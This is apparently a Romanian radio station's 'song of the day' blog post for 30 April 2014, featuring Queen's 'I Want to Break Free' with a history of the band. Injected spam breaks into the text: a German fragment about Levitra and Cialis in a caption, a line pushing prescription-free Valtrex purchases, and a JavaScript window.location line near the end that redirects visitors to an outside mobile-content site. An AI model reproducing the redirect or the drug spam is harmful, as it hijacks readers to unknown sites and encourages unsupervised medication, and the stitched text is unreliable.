Melodia zilei de 30 Aprilie 2014

 

Queen – “I want to break free”

Inceputurile formatiei Queen sunt localizate in Anglia anului 1968, cand Brian May si Roger Taylor au pus bazele trio-ului SMILE. Dupa ce Tim Staffell, basist si solist, iese din trupa in primavara anului 1970, locul sau este luat de colegul sau de camera Freddie Mercury, care se alatura celor doi, May si Taylor, pentru a forma QUEEN. In anul 1971, locul de basist este ocupat de John Deacon, completand astfel componenta. Membrii Queen sunt cunoscuti ca fiind pionieri ai heavy metal, glam rock, uneori calcand si in zona rockului progressive. Desi personalitatea lui Freddie Mercury a dominat in presa, toti cei 4 membri au compus hituri uriase (Freddie Mercury – “Bohemian Rhapsody”, Brian May – “We Will Rock You”, Roger Taylor – “Radio Ga Ga”, John Deacon – “Another One Bites The Dust”).

ABBA--eclipsata-de-Queen – allergie auf vardenafil (levitra) oder tadalafil (Cialis);

Pentru majoritatea albumelor formatiei fiecare membru a scris macar o piesa, si, desi, Freddie Mercury a compus multe hituri, nu a fost nicidecum compozitorul dominant; cei patru se considerau egali din punct de vedere al creativitatii.

Albumul de debut, “QUEEN”, a fost lansat in 1973. N-a atras prea mult atentia publicului, dar a reusit sa produca un hit pentru posturile de radio – “Keep Yourself Alive”. In general este vazut ca fiind un album de debut destul de reusit. Anul 1974 a adus cu el doua lansari discografice din partea trupei. Primul s-a numit “Queen II”, cu hitul “Seven Seas of Rhye” a fost unul experimental si nu a atras prea mult atentia, insa single-ul lor a intrat in topurile britanice. Mai tarziu, in acelasi an, a fost lansat cel de-al 3 lea album al formatiei, intitulat “Sheer Heart Attack” care fost un succes in Marea Britanie si in Europa; a fost disc de aur in SUA. A fost considerat unul dintre cele mai mari eforturi artistice ale formatiei. Queen a facut un album de o coeziune uimitoare abordand o varietate de stiluri muzicale.

Urmatorul album, “A NIGHT AT THE OPERA”, lansat in 1975, a fost si mai apreciat, formatia abordand si de aceasta data mai multe directii muzicale. Unele voci au sustinut ca acest album a fost pentru Queen ceea ce a reprezentat albumul “IV” pentru Led Zeppelin. A continut hitul urias “Bohemian Rhapsody” care a stat pe locul 1 in UK timp de 9 saptamani, si a urcat pana pe locul 9 in SUA.

index

In 1977 este lansat “NEWS OF THE WORLD”, un album criticat la inceput dar care odata cu trecerea timpului a primit tot mai multe aprecieri. Acest album a avut un suflu sonor mai puternic, dar si piese croite de o asa factura incat sa sune bine in concerte. Albumul contine imnul “We Will Rock You” precum si faimoasa balada rock “We Are The Champions”, precum si piesa “Sheer Heart Attack” cu un sunet de influente punk. Anul 1978 este marcat de lansarea albumului “JAZZ”, care include hiturile “Fat Bottomed Girls” si “Bicycle Race”, coperta albumului fiind inspirata dintr-o pictura de pe zidul Berlinului. Alte piese importante de pe acest album sunt “Dead on Time”, “Let Me Entertain You” sau “Mustapha”, ultima piesa fiind scrisa de Freddie, avand un sound ‘arabic’ combinat cu un sunet de chitara heavy.

In 1984, QUEEN a continuat sa se indeparteze de hard-rock cu albumul “THE WORKS”, pe care se regasesc piese de succes ca “RADIO GA-GA”, “I WANT TO BREAK FREE”(aceasta a devenit imnul miscarii democratice din Brazilia si mai tarziu a fost folosita in reclame pentru COCA COLA). In ciuda acestor hit single-uri, albumul nu s-a vandut extraordinar, aceasta determinand aparitia unor tensiuni in interiorul formatiei.

Queen

Videoclipul piesei “I WANT TO BREAK FREE” a parodiat o telenovela britanica, Freddie Mercury fiind huiduit cand a aparut pe scena de la ROCK IN RIO imbracat ca in videoclip; brazilienii prezenti la concert au considerat ca prin gestul sau, Mercury degrada ceea ce pentru Brazilia era un imn democratic. Brian May declarase ca videoclipul a daunat vanzarilor albumelor QUEEN in SUA. Vanzarile mici ale albumului THE WORKS i-a impins pe membrii formatiei sa dezvolte proiecte solo in acea perioada. Apoi a venit momentul LIVE AID, in 1985, concert de caritate la care formatia a fost invitata sa participe. Dupa parerea criticilor dar si a fanilor, grupul a facut cel mai mare show, cantand unele dintre cele mai bune piese ale lor, uluind spectatorii cu o prezenta scenica energica si de ‘spectacolul’ oferit.

Revitalizati de reactia publicului in urma concertului LIVE AID, dar si de cresterile semnificative ale vanzarilor, membrii formatiei au lansat la finele anului 1985 single-ul “ONE VISION”, ce a fost folosit pe coloana sonora a filmului “IRON EAGLE”.

Queen1

O melodie frumoasa semnata de Queen – “I want to break free”, este aleasa melodia zilei de 30 Aprilie 2014 la Radio Enigma Romania.

A good way out is to buy Valtrex online with no prescription required, as you will be getting the same quality for a lot less money. The reason why medicationsВ  O melodie superba pe care tu enigmatic/a… ai ales-o piesa zilei si pe care noi cei de la Radio Enigma Romania ti-o daruim cu mare drag si mereu cu acelasi mesaj: Simte, traieste si iubeste!

Haideti sa il ascultam si noi.

O zi frumoasa sa ai alaturi de cei dragi tie,
alaturi de Radio Enigma Romania -Vocea gandurilor tale.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *